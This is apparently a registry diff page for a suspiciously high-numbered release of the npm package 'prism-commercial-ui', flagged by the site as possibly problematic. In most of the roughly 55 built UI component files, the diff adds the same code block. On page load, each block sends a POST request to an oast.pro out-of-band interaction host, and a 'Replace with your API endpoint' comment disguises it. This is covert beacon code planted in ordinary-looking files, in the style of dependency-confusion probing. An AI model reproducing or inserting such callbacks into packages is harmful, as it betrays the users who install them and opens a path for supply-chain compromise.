prism-commercial-ui 100.100.119
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of prism-commercial-ui might be problematic. Click here for more details.
- package/core/dist/esm/module.entry.js +20 -0
- package/core/dist/esm/nutrition-table-row.entry.js +20 -0
- package/core/dist/esm/nutrition-table.entry.js +20 -0
- package/core/dist/esm/prism-commercial-accordion.entry.js +20 -0
- package/core/dist/esm/prism-commercial-action-menu-button_2.entry.js +20 -0
- package/core/dist/esm/prism-commercial-action-menu.entry.js +20 -0
- package/core/dist/esm/prism-commercial-alert-banner.entry.js +20 -0
- package/core/dist/esm/prism-commercial-alert-inline.entry.js +20 -0
- package/core/dist/esm/prism-commercial-avatar.entry.js +20 -0
- package/core/dist/esm/prism-commercial-badge-numeric.entry.js +20 -0
- package/core/dist/esm/prism-commercial-badge-status.entry.js +20 -0
- package/core/dist/esm/prism-commercial-breadcrumb-set.entry.js +20 -0
- package/core/dist/esm/prism-commercial-breadcrumb.entry.js +20 -0
- package/core/dist/esm/prism-commercial-button_2.entry.js +20 -0
- package/core/dist/esm/prism-commercial-checkbox-group.entry.js +20 -0
- package/core/dist/esm/prism-commercial-checkbox.entry.js +20 -0
- package/core/dist/esm/prism-commercial-close-button.entry.js +20 -0
- package/core/dist/esm/prism-commercial-collapsible.entry.js +20 -0
- package/core/dist/esm/prism-commercial-data-range-pagination.entry.js +20 -0
- package/core/dist/esm/prism-commercial-diy-grey-card-low.entry.js +20 -0
- package/core/dist/esm/prism-commercial-diy-outlined-white-card-medium.entry.js +20 -0
- package/core/dist/esm/prism-commercial-file-upload.entry.js +20 -0
- package/core/dist/esm/prism-commercial-flag-delta.entry.js +20 -0
- package/core/dist/esm/prism-commercial-flag-filter.entry.js +20 -0
- package/core/dist/esm/prism-commercial-flag.entry.js +20 -0
- package/core/dist/esm/prism-commercial-flow-stepper-container.entry.js +20 -0
- package/core/dist/esm/prism-commercial-flow-stepper-item.entry.js +20 -0
- package/core/dist/esm/prism-commercial-generic-card.entry.js +20 -0
- package/core/dist/esm/prism-commercial-hamburger.entry.js +20 -0
- package/core/dist/esm/prism-commercial-high-impact-tab-bar.entry.js +20 -0
- package/core/dist/esm/prism-commercial-horizontal-tab-bar.entry.js +20 -0
- package/core/dist/esm/prism-commercial-icon-button.entry.js +20 -0
- package/core/dist/esm/prism-commercial-icon_2.entry.js +20 -0
- package/core/dist/esm/prism-commercial-in-page-navigation.entry.js +20 -0
- package/core/dist/esm/prism-commercial-menu-child.entry.js +20 -0
- package/core/dist/esm/prism-commercial-menu-item.entry.js +20 -0
- package/core/dist/esm/prism-commercial-modal-generic.entry.js +20 -0
- package/core/dist/esm/prism-commercial-page-level-pagination.entry.js +20 -0
- package/core/dist/esm/prism-commercial-pagination-arrow.entry.js +20 -0
- package/core/dist/esm/prism-commercial-pagination-number.entry.js +20 -0
- package/core/dist/esm/prism-commercial-progress-bar.entry.js +20 -0
- package/core/dist/esm/prism-commercial-progressive-form-stepper.entry.js +20 -0
- package/core/dist/esm/prism-commercial-radio-button.entry.js +20 -0
- package/core/dist/esm/prism-commercial-search-input.entry.js +20 -0
- package/core/dist/esm/prism-commercial-select.entry.js +20 -0
- package/core/dist/esm/prism-commercial-single-input.entry.js +20 -0
- package/core/dist/esm/prism-commercial-slot-placeholder.entry.js +20 -0
- package/core/dist/esm/prism-commercial-star-ratings.entry.js +20 -0
- package/core/dist/esm/prism-commercial-tab.entry.js +20 -0
- package/core/dist/esm/prism-commercial-text-toggle.entry.js +20 -0
- package/core/dist/esm/prism-commercial-toast.entry.js +20 -0
- package/core/dist/esm/prism-commercial-toggle-switch.entry.js +20 -0
- package/core/dist/esm/prism-commercial-tooltip.entry.js +20 -0
- package/core/dist/esm/prism-commercial-utility-button.entry.js +20 -0
- package/core/dist/esm/prism-commercial-vertical-tabs.entry.js +20 -0
- package/package.json +12 -0
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
